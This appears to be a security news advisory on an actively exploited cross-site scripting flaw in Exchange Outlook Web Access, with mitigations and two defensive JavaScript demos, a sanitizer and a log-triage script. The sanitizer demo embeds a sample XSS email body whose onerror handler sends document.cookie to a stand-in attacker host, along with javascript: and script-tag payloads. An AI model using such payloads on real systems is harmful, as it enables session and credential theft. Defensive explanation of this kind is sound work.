
CVE-2026-42897: Microsoft Exchange Zero-Day Is Being Exploited Right Now — Patch Immediately


Microsoft has confirmed that a newly disclosed security vulnerability in on-premises Exchange Server, tracked as CVE-2026-42897, is being actively exploited in the wild. The flaw, rated 8.1 on the CVSS scale, allows an attacker to execute arbitrary JavaScript in a victim’s browser simply by sending them a crafted email. No malicious attachment is needed and there is no link to click: under certain conditions, opening the email in Outlook Web Access (OWA) is enough to trigger the attack.

CISA added CVE-2026-42897 to its Known Exploited Vulnerabilities catalog on May 15, requiring all Federal Civilian Executive Branch agencies to remediate by May 29. If you’re running Exchange Server 2016, 2019, or the Subscription Edition and you haven’t applied Microsoft’s emergency mitigation, you need to act today.

How CVE-2026-42897 Works

At its technical core, CVE-2026-42897 is a cross-site scripting (XSS) vulnerability in Exchange Server’s Outlook Web Access interface, the browser-based email client used by millions of corporate employees worldwide. The untrusted input is the message itself: HTML that an outside sender controls is rendered inside a page the victim is already authenticated to.

The attack chain is deceptively simple:

  • An attacker sends the target an email whose HTML body carries the XSS payload.
  • When the target opens the message in OWA, the server renders it without properly sanitizing the HTML content.
  • The attacker’s JavaScript executes in the victim’s authenticated OWA session, with the same origin and the same access the user has.
  • From there, the attacker can read and send mail as the user, steal session cookies, credentials, or NTLM hashes, or pivot to further attacks against the organization’s internal network.

What makes this particularly dangerous is the attack’s passive nature. There is no phishing link to click, no attachment to open. An employee simply checking their email — a thing they do dozens of times per day — can silently compromise their session. Security-aware users who have been trained to “never click suspicious links” have no defense against a malicious email that requires only reading.
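To make the failure behind this class of bug concrete, here is an added example in JavaScript. It is not Exchange code and not the payload seen in the wild (Microsoft has not published one): a toy web-mail renderer that inlines the HTML body of a message unchanged, beside an allow-list sanitizer that closes the hole. The sample message body, the allow-listed tags and attributes, and the attacker host name are all constructed for this example.

```javascript
// Added example (not Exchange code): a toy web-mail renderer showing the XSS
// pattern described above and an allow-list sanitizer that closes it.
// The tag/attribute lists and the sample message are constructed for this example.

const ALLOWED_TAGS = new Set(['p', 'br', 'b', 'i', 'u', 'strong', 'em', 'a',
                              'ul', 'ol', 'li', 'div', 'span', 'blockquote']);
const ALLOWED_ATTRS = new Map([['a', new Set(['href', 'title'])], ['*', new Set(['title'])]]);

// Escape text nodes and attribute values so they can never open a tag or break out of a quote.
function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Only http(s) and mailto links survive. Browsers ignore ASCII control characters and
// spaces inside a scheme, so strip them before checking ("java\tscript:" is still javascript:).
function safeUrl(value) {
  const v = value.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  return /^(https?:|mailto:)/.test(v);
}

// Keep only allow-listed attributes; everything else (onerror=, style=, srcdoc=, ...) is dropped.
function sanitizeAttrs(tag, rawAttrs) {
  const attrRe = /([^\s=\/"'<>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  const allowed = ALLOWED_ATTRS.get(tag) ?? ALLOWED_ATTRS.get('*');
  let out = '';
  let m;
  while ((m = attrRe.exec(rawAttrs)) !== null) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? '';
    if (!allowed.has(name)) continue;
    if (name === 'href' && !safeUrl(value)) continue; // drops javascript: and data: URLs
    out += ` ${name}="${escapeText(value)}"`;
  }
  return out;
}

// Tokenize on tags. Anything that is not a permitted tag is escaped as text or dropped,
// so an unrecognized construct fails closed instead of reaching the browser's parser raw.
function sanitizeHtml(html) {
  const tagRe = /<!--[\s\S]*?-->|<\/?([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  const out = [];
  let i = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out.push(escapeText(html.slice(i, m.index)));      // text between tags
    i = tagRe.lastIndex;
    if (m[1] === undefined) continue;                  // HTML comment: dropped
    const name = m[1].toLowerCase();
    const closing = m[0][1] === '/';
    if (name === 'script' || name === 'style') {       // drop the element and its whole body
      if (!closing) {
        const closeRe = new RegExp(`</${name}\\s*>`, 'ig');
        closeRe.lastIndex = i;
        i = closeRe.exec(html) ? closeRe.lastIndex : html.length;
        tagRe.lastIndex = i;
      }
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) continue;             // unknown tag dropped, its text kept
    out.push(closing ? `</${name}>` : `<${name}${sanitizeAttrs(name, m[2])}>`);
  }
  out.push(escapeText(html.slice(i)));
  return out.join('');
}

// The vulnerable pattern: the MIME body is trusted and inlined into the authenticated page.
function renderEmailUnsafe(subject, bodyHtml) {
  return `<h2>${subject}</h2><div class="body">${bodyHtml}</div>`;
}

// The hardened path: subject escaped as text, body passed through the allow-list.
function renderEmailSafe(subject, bodyHtml) {
  return `<h2>${escapeText(subject)}</h2><div class="body">${sanitizeHtml(bodyHtml)}</div>`;
}

// Constructed message body in the style of an XSS-bearing email (attacker.example is made up).
const SAMPLE_BODY =
  '<p>Quarterly report attached.</p>' +
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' +
  '<A HREF="  JaVaScRiPt:alert(document.domain)">Open</A>' +
  '<script>alert(1)</script>';

console.log('unsafe:', renderEmailUnsafe('Q2 numbers', SAMPLE_BODY));
console.log('safe:  ', renderEmailSafe('Q2 numbers', SAMPLE_BODY));
```

Run it with node. The point of the allow-list design is that it fails closed: mixed-case tag names, whitespace-padded javascript: schemes and entity-encoded attribute values all fall through to the "drop" path because nothing is emitted unless it was positively recognized. This regex tokenizer is still a teaching aid: it does not decode entities and treats a > inside an attribute value as the end of the tag (both fail safe here), and the browser's parser always has the last word, so a production sanitizer should be built on a real HTML parser such as DOMPurify and backed by a Content Security Policy that forbids inline script.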

According to Security Affairs, Microsoft confirmed active exploitation but has not disclosed the identity of threat actors, the scale of attacks, or which organizations have been targeted — a frustratingly common gap in Microsoft’s vulnerability disclosures.

Who Is Affected

The vulnerability affects all major on-premises Exchange Server versions:

  • Exchange Server 2016 — all Cumulative Update levels
  • Exchange Server 2019 — all Cumulative Update levels
  • Exchange Server Subscription Edition — all update levels

Critically, Microsoft Exchange Online (cloud) is not affected. Organizations that migrated to Microsoft 365 or Exchange Online are safe from this specific vulnerability. The risk is entirely concentrated in on-premises deployments — which still represents tens of thousands of organizations worldwide, particularly in regulated industries (healthcare, finance, government) and enterprises with legacy infrastructure they cannot easily move to the cloud.

If you’re using Exchange on-premises and accessing email via OWA, consider this critical and treat it accordingly.

Microsoft’s Emergency Mitigations

Microsoft has not yet released a full security update patch for CVE-2026-42897. Instead, the company pushed interim mitigation measures through the Exchange Emergency Mitigation Service (EEMS) — a mechanism introduced after the catastrophic ProxyLogon vulnerabilities of 2021 that allows Microsoft to push temporary fixes to Exchange servers automatically.

The EEMS mitigation for CVE-2026-42897 has been deployed to servers that have the service enabled and are connected to Microsoft’s update infrastructure. However, organizations in air-gapped environments, those who have disabled EEMS, or those running heavily customized Exchange deployments may not have received the automatic mitigation.

Administrators should verify EEMS status immediately. Instructions are available in the Microsoft Community Hub advisory.

Additional manual mitigations include disabling OWA for external access until the patch is available (drastic but effective) and, if a web application firewall fronts OWA, rules that strip or block the HTML constructs the exploit uses. Treat WAF rules as defense in depth rather than a fix: generic XSS signatures are easy to evade with encoding and markup variations, and they do nothing for mail opened from inside the network.

Context: Exchange Server’s Ongoing Security Crisis

CVE-2026-42897 is not an anomaly; it is part of a pattern. Exchange Server has been one of the most persistently targeted enterprise products in the world for half a decade. The ProxyLogon zero-days in 2021 were exploited by Chinese state hackers (Hafnium) to breach tens of thousands of organizations before patches were available. ProxyShell followed months later. ProxyNotShell in 2022. OWASSRF. Each wave exploited the same fundamental architecture: a complex, internet-facing enterprise email server with a sprawling attack surface.

The question that security architects must now seriously confront: is on-premises Exchange Server still a defensible architecture in 2026? For most organizations, the honest answer is no. The migration costs and complexity that kept enterprises on-prem are real, but so is the perpetual stream of critical vulnerabilities. As Mandiant’s M-Trends 2026 found, time-to-exploit has gone negative: attackers are now routinely exploiting vulnerabilities before patches arrive. Legacy on-prem email servers are an increasingly untenable surface to defend.

What You Should Do Right Now

If you manage Exchange Server infrastructure, here is the priority action list for the next 48 hours:

  • Verify EEMS is active and the CVE-2026-42897 mitigation has been applied. In the Exchange Management Shell, Get-ExchangeServer <server> | Format-List MitigationsEnabled, MitigationsApplied, MitigationsBlocked shows whether the service is enabled and which mitigations are in force; Get-Mitigations.ps1 in the Exchange Scripts folder reports the same.
  • Restrict OWA to internal access only until the official patch is released. If external OWA access is business-critical, put it behind a VPN or require client certificate authentication.
  • Review your OWA access logs (the IIS logs for the /owa virtual directory and the HttpProxy Owa logs) and mailbox audit logs going back to May 1. The script runs in the victim’s browser, so the server never records “JavaScript execution”; look instead for an account’s OWA session being used from a second client IP or user agent, newly created inbox rules or forwarding, and evidence of lateral movement from accounts that regularly use OWA.
  • Add WAF rules to block common XSS payloads if you have a web application firewall in front of your Exchange OWA endpoint, and expect them to be bypassable; they buy time, not safety.
  • Accelerate your Exchange Online migration planning. CVE-2026-42897 is a symptom, not the disease. On-prem Exchange is a perpetual risk surface.
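As an added example of the log review step (not Microsoft tooling and not a published indicator for this CVE), the script below parses IIS W3C log lines for the /owa virtual directory and flags any authenticated account whose OWA requests arrive from more than one client IP or user agent inside a short window, which is what a replayed session cookie looks like from the server side. The log lines, host names, account names and the 15-minute window are all constructed assumptions of this example.

```javascript
// Added example (not Microsoft tooling): triage of IIS W3C log lines for /owa requests.
// The log lines are constructed. The heuristic (one account used from several client
// IPs or user agents inside a short window, as a stolen session would be) is an
// assumption of this example, not an indicator Microsoft has published.

const SAMPLE_LOG = `#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2026-05-14 09:00:50 10.0.0.5 GET /owa/auth/logon.aspx url=https://mail.example.com/owa/ 443 - 192.0.2.10 Mozilla/5.0+(Windows+NT+10.0)+Firefox/126.0 - 200 0 0 40
2026-05-14 09:01:12 10.0.0.5 GET /owa/ - 443 CORP\\jsmith 192.0.2.10 Mozilla/5.0+(Windows+NT+10.0)+Firefox/126.0 - 200 0 0 120
2026-05-14 09:02:40 10.0.0.5 POST /owa/service.svc action=FindConversation 443 CORP\\jsmith 192.0.2.10 Mozilla/5.0+(Windows+NT+10.0)+Firefox/126.0 https://mail.example.com/owa/ 200 0 0 88
2026-05-14 09:03:05 10.0.0.5 POST /owa/service.svc action=CreateItem 443 CORP\\jsmith 198.51.100.77 python-requests/2.31 - 200 0 0 61
2026-05-14 09:10:00 10.0.0.5 GET /owa/ - 443 CORP\\adoe 192.0.2.11 Mozilla/5.0+(Windows+NT+10.0)+Chrome/125.0 - 200 0 0 130`;

// Parse W3C extended log text into row objects keyed by the names in the #Fields directive.
function parseIisW3c(text) {
  let fields = null;
  const rows = [];
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    if (!line) continue;
    if (line.startsWith('#Fields:')) {
      fields = line.slice('#Fields:'.length).trim().split(/\s+/);
      continue;
    }
    if (line.startsWith('#') || !fields) continue;     // other directives, or no header yet
    const cols = line.split(' ');
    if (cols.length !== fields.length) continue;       // skip truncated or malformed lines
    rows.push(Object.fromEntries(fields.map((f, i) => [f, cols[i]])));
  }
  return rows;
}

// Group authenticated /owa requests by account and report accounts whose requests within
// windowMinutes of each other come from more than one (client IP, user agent) pair.
function findSessionAnomalies(rows, windowMinutes = 15) {
  const windowMs = windowMinutes * 60 * 1000;
  const byUser = new Map();
  for (const r of rows) {
    if (!r['cs-uri-stem'].toLowerCase().startsWith('/owa') || r['cs-username'] === '-') continue;
    const ts = Date.parse(`${r.date}T${r.time}Z`);     // W3C logs are written in UTC
    const reqs = byUser.get(r['cs-username']) ?? [];
    reqs.push({ ts, source: `${r['c-ip']} ${r['cs(User-Agent)']}`, uri: r['cs-uri-stem'] });
    byUser.set(r['cs-username'], reqs);
  }
  const findings = [];
  for (const [user, reqs] of byUser) {
    reqs.sort((a, b) => a.ts - b.ts);
    const suspect = new Set();
    for (let i = 0; i < reqs.length; i++) {
      for (let j = i + 1; j < reqs.length && reqs[j].ts - reqs[i].ts <= windowMs; j++) {
        if (reqs[i].source !== reqs[j].source) {
          suspect.add(reqs[i].source);
          suspect.add(reqs[j].source);
        }
      }
    }
    if (suspect.size > 1) findings.push({ user, sources: [...suspect] });
  }
  return findings;
}

const demoFindings = findSessionAnomalies(parseIisW3c(SAMPLE_LOG));
for (const f of demoFindings) {
  console.log(`${f.user}: OWA session used from ${f.sources.length} distinct sources`, f.sources);
}
```

On a real server the IIS logs are typically under C:\inetpub\logs\LogFiles\W3SVC1 and the Exchange front-end proxy logs under %ExchangeInstallPath%Logging\HttpProxy\Owa; IIS does not log the cookie field by default, so source IP and user agent are the usable proxies for session reuse. Expect false positives from VPN roaming and from users who switch between a desktop browser and a phone, and tune the window accordingly; a hit is a lead for mailbox audit review, not a verdict.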

CISA’s Deadline: May 29

CISA’s Known Exploited Vulnerabilities (KEV) catalog mandate gives Federal Civilian Executive Branch agencies until May 29, 2026 to remediate CVE-2026-42897. While this mandate technically applies only to federal agencies, it serves as a signal to the private sector: this vulnerability is being actively exploited and requires urgent attention.

Non-federal organizations that wait for Microsoft’s official patch before acting are gambling that no threat actor has them in their sights in the meantime. Given the confirmed active exploitation — and the still-unknown identity of the attackers behind it — that is not a gamble worth taking.

Apply the interim mitigation today. Monitor for the official patch. And seriously reconsider whether on-premise Exchange is where you want to be when the next critical vulnerability drops — because there will be one.

For a broader picture of the 2026 vulnerability landscape, see our coverage of the cPanel zero-day CVE-2026-41940 and SudoFlare’s full cybersecurity coverage.
